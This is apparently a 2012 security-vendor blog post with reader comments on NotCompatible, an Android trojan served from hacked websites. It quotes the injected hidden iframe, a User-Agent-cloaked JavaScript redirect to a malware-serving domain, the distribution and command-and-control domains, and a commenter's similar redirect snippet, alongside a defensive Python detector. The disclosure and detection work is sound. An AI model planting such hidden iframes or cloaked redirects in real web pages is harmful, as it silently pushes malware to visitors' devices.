May 2, 2012

UPDATE: Security Alert: Hacked Websites Serve Suspicious Android Apps (NotCompatible)

Update Two: Based on our current research, NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update. This threat does not currently appear to cause any direct harm to the infected device, but it could be used to gain illicit access to private networks by turning that device into a proxy. As previously mentioned, this appears to be the first time compromised websites have been used to distribute malware targeting Android devices.

Distribution of NotCompatible depends on compromised websites that have a hidden iframe inserted at the bottom of each page. If a user visits a compromised website from an Android device, the mobile web browser automatically begins downloading the NotCompatible application, named ‘Update.apk’. The browser only downloads the file: the user still has to install the downloaded application (which also requires the “Unknown sources” setting to be enabled, see below) before a device is infected. Based on our initial investigation, we have confirmed that a number of websites have been compromised. However, the affected sites appear to have relatively low traffic, and we expect the total impact to Android users to be low.

This specific sample, while relatively well constructed, does not appear to go to great lengths to hide its intended purpose: it can be used to access private networks. That capability is what should concern IT administrators: a device infected with NotCompatible could potentially be used as a pivot into normally protected information or systems, such as those maintained by enterprises or government.

Update: All Lookout users are currently protected against NotCompatible. Lookout protects users from drive-by downloads when the File System Monitoring and Install Monitoring features are active. These additional layers of protection alert users to known threats when they are downloaded to device storage, such as the /Downloads folder on the SD card, and immediately before they are installed via sideloading.

Hacked websites are frequently used to infect PCs with malware; today, however, we have identified the first case of hacked websites being used to specifically target mobile devices. Lookout is in the process of rolling out an update to protect against the new threat, NotCompatible.

How it Works

In this specific attack, if a user visits a compromised website from an Android device, the web browser automatically begins downloading an application. This process is commonly referred to as a drive-by download, although, unlike a PC drive-by that exploits the browser itself, the file is only downloaded here and must still be installed by the user.

When the suspicious application finishes downloading, the device displays a notification prompting the user to tap it to install the downloaded app. In order to actually install the app, the device must have the “Unknown sources” setting enabled (installing apps from outside the market this way is commonly referred to as “sideloading”). If the setting is not enabled, the installation is blocked.

(Screenshots originally posted by redditor, Georgiabiker)

Technical details

Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
  style="visibility: hidden; display: none; display: none;"
  src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

When a PC-based web browser requests the page at gaoanalitics.info, the server returns a “not found” error; if, however, the browser’s User-Agent header contains the word “Android”, the following is returned:

<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>

This page makes the browser immediately load androidonlinefix.info. Like the previous site, only browsers sending an Android User-Agent string trigger a download (all other browsers see a blank page). When visited from an Android browser, the server returns an Android application package, which the browser automatically downloads.
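The two web-side indicators described above (a CSS-hidden iframe injected into an otherwise ordinary page, and a redirector that cloaks itself behind a User-Agent check) are easy to check for mechanically. The following is an added example, not Lookout’s code: the sample page and the stand-in redirector are constructed to mirror the behaviour described in this post, and only the two domain names come from the post. The redirect matcher also accepts the bare `top.location = '…'` form of the same trick, not just `window.top.location.href`.

```python
"""Detect the NotCompatible web-side chain described in the post:

  1. a hidden <iframe> injected at the bottom of a compromised page, pointing
     at the redirector (gaoanalitics.info);
  2. a redirector that answers "not found" to ordinary browsers but returns a
     window.top.location.href redirect when the User-Agent contains "Android".

Added example, not Lookout's code. SAMPLE_PAGE and fake_redirector() are
constructed for the demo; the domain list is taken from the post.
"""
import re
from html.parser import HTMLParser
from typing import Callable, Dict, List, Tuple

# Domains named in the post as part of the redirect / APK delivery chain.
KNOWN_DISTRIBUTION_DOMAINS = {"gaoanalitics.info", "androidonlinefix.info"}

HIDDEN_CSS = re.compile(r"(visibility\s*:\s*hidden|display\s*:\s*none)", re.I)
# Matches window.top.location.href = "..." as well as the shorter top.location = '...'
REDIRECT_JS = re.compile(
    r"(window\.)?top\.location(\.href)?\s*=\s*['\"](?P<url>[^'\"]+)['\"]", re.I)


class _IframeCollector(HTMLParser):
    """Collects every <iframe> start tag with its attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.iframes: List[Dict[str, str]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag == "iframe":  # HTMLParser already lower-cases tag/attr names
            self.iframes.append({k: (v or "") for k, v in attrs})


def _host(url: str) -> str:
    """Hostname of a URL; also accepts the defanged hxxp:// form used in reports."""
    m = re.match(r"^(?:h[tx]{2}ps?:)?//([^/:?#]+)", url.strip(), re.I)
    return m.group(1).lower() if m else ""


def find_hidden_iframes(html: str) -> List[Tuple[str, bool]]:
    """Return (src_host, is_known_bad) for every iframe hidden via inline CSS.

    The injected iframe in the post uses both visibility:hidden and
    display:none; either one alone is enough to flag it here.
    """
    parser = _IframeCollector()
    parser.feed(html)
    hits = []
    for frame in parser.iframes:
        if HIDDEN_CSS.search(frame.get("style", "")):
            host = _host(frame.get("src", ""))
            hits.append((host, host in KNOWN_DISTRIBUTION_DOMAINS))
    return hits


def redirect_target(body: str) -> str:
    """Extract the URL from a top-frame JavaScript redirect, or '' if none."""
    m = REDIRECT_JS.search(body)
    return m.group("url") if m else ""


Fetch = Callable[[str], Tuple[int, str]]  # user_agent -> (status, body)


def detect_ua_cloaking(fetch: Fetch) -> Dict[str, object]:
    """Request the same resource as a desktop and as an Android browser.

    Flags the resource when the desktop view is an error or blank page while
    the Android view carries a JavaScript redirect: the cloaking behaviour
    the post describes for gaoanalitics.info.
    """
    desktop_ua = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36"
    android_ua = "Mozilla/5.0 (Linux; U; Android 2.3.4) AppleWebKit/533.1"
    d_status, d_body = fetch(desktop_ua)
    _a_status, a_body = fetch(android_ua)
    target = redirect_target(a_body)
    cloaked = (d_status == 404 or not d_body.strip()) and bool(target)
    return {"cloaked": cloaked,
            "android_redirect": target,
            "redirect_host_known": _host(target) in KNOWN_DISTRIBUTION_DOMAINS}


# --- constructed sample input (not a real captured page) --------------------
SAMPLE_PAGE = """<html><body><p>Welcome to my blog.</p>
<iframe style="visibility: hidden; display: none;"
 src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
<iframe src="https://www.youtube.com/embed/x" style="border:0"></iframe>
</body></html>"""


def fake_redirector(user_agent: str) -> Tuple[int, str]:
    """Stand-in for the gaoanalitics.info behaviour described in the post (constructed)."""
    if "android" in user_agent.lower():
        return 200, ('<html><head></head><body><script type="text/javascript">'
                     'window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";'
                     '</script></body></html>')
    return 404, "Not Found"


if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE_PAGE))
    print(detect_ua_cloaking(fake_redirector))
```

In practice `fetch` would be a small wrapper around an HTTP client that sets the User-Agent header; keeping it as a parameter lets the cloaking check run offline against the constructed redirector above and against a benign page that answers identically to both agents.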

Suspicious applications are currently served from the following sites:

  • gaoanalitics.info
  • androidonlinefix.info

Command and Control (C&C) domains include:

  • notcompatibleapp.eu

As Lookout identifies the extent of infected websites, we will update this blog post.

The Lookout security team is actively investigating the infected websites and suspicious application.  Refer back to this blog post for regular updates on this security alert.

17 comments
  1. Leonidas says:

    thanks for the warning, will be alert

  2. Chris says:

    The app is good, up until today I always recommended this app to all of my users, friends, and colleagues (I work in IT). However, after a very disturbing discovery and then almost offensive response from customer service, I will be exploring other options for my mobile security (as well as recommending to everyone they avoid Lookout) since most of the people I deal with need to protect multiple mobile devices and Lookout only protects 2 devices. As if this short-sightedness were not enough, your customer service department’s (as represented by one Yvette Kay) only suggestion as a palliative until if/when you correct this is to purchase a 2nd Premium account. This within 5 minutes of my CC being charged for my 6 month membership ($29.99). As an IT professional, I am utterly appalled at this, and am hoping this blatant evidence of such a noncaring, mercenary attitude is not representative of your company’s attitude towards us as users, and I pray someone contacts me to resolve this as expeditiously as possible.

    Chris

  3. Expert says:

    Initially, while reading your blog post, I was very interested to see how drive-by downloads migrated to Android. Unfortunately, it seems your terminology is somewhat disconnected from reality. A drive-by download denotes the installation of malware without the user’s interaction or consent as a consequence of the mere visit of a web site. What you are describing is more in line with threats such as Fake AV and the like, where the user is persuaded through social engineering to voluntarily install malware on their device. The security industry would be ill-advised to use the term drive-by download for such social engineering attacks, as these are harder to defend against (from a technology standpoint at least).

  4. Tony says:

    Surely I am gonna buy all of your packages now! So scared!!

  5. Bob says:

    What does one do if it has already been downloaded and installed? Can you just uninstall it, and you’ll be safe again, or what would you recommend?

  6. Francis Turner says:

    This appears to be linked to the “Russian Business Network” cyber criminal gang(s). The androidonlinefix.info domain resolves to two IP addresses that are known to be associated with this network and the gaoanalitics.info one resolves to an address in Ukraine which isn’t known to be associated but which is hosted in an ASN that has other known RBN hosts on it.

    I blogged a little about this at our blog – http://blog.threatstop.com/2012/05/03/threatstop-blocks-android-malware-drive-by/

  7. Adel Ka says:

    Thanks for the useful post.
    In update two, you said “Like *any* drive-by downloads, a user needs to install the downloaded application before a device will be infected.” In this case, user interaction is needed. But generally, drive-by download attacks occur silently, with no user interaction.

  8. ExploitTheMedia says:

    “Like any drive-by downloads, a user needs to install the downloaded application before a device will be infected” … really?

    So, let me get this straight … I have to configure my Android device to allow installs from 3rd-party sources, AND I have to tell the package installer to execute before I’m infected. Seems to be a bit of a distortion of the definition of a drive-by if you ask me.

  9. Rippidip says:

    Does this affect all browsers on Android (Dolphin, Firefox, Chrome, “Robot” etc.) or just the stock browser?

  11. jhon says:

    Security is the most important issue for using internet services on mobile. Android has added a security service; of course it is essential for safety purposes. Thanks for the service.

  12. George says:

    Ya, I am also repeating the same question: does it affect all sites, or does it depend on the site strength?

  13. Wim Rijksen says:

    I got a mail with no subject today, addressed to a bunch of people, containing only a URL: http://www.adheijnehengelo.nl/wp-content/plugins/zaeuxuoueen/biokrls.html?aba=shxaps
    Opening this on my Android device, it downloaded update.apk, which I did not install.
    The document (biokrls.html) contained this:

    if (navigator.userAgent.toLowerCase().indexOf("android") > -1) { top.location = 'http://194.60.242.54/goo/'; }

    You are here because one of your friends have invited you.
    Page loading, please wait….

  15. Melvin Davenport says:

    This message was seen as part of a routine planted on my laptop. The message came after my unit was off for some days. No activity was possible after this message was seen; only restarts followed. Please tell me how to protect against this trojan/virus. My Windows 8 had to be wiped along with my data. Feel free to contact
    for more info and I will try to pass on what I experienced to Microsoft and others like AVG.

Leave a comment